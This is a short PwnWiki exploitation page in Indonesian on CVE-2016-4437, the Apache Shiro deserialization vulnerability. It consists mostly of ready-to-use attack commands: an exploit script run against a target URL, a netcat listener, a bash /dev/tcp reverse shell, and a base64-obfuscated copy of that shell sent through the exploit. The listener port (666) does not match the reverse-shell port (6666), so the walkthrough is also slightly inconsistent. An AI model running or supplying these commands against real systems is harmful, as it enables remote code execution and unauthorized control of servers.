CVE-2016-4437 Kerentanan deserialisasi Shiro

From PwnWiki
Revision as of 21:18, 26 May 2021 by Pwnwiki (talk | contribs) (Created page with "Perintah berhasil dijalankan.")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Bahasa Indonesia • ‎Chinese • ‎русский • ‎中文(简体)‎

POC

https://github.com/insightglacier/Shiro_exploit


Eksploitasi

python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "touch a.txt"

Perintah berhasil dijalankan.


Getshell

Mesin pemantau menjalankan perintah berikut: 

nc -lvp 666

Mesin korban menjalankan perintah berikut: 

bash -i >& /dev/tcp/192.168.2.130/6666 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}



python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2016-4437_Shiro反序列化漏洞/id&oldid=3335"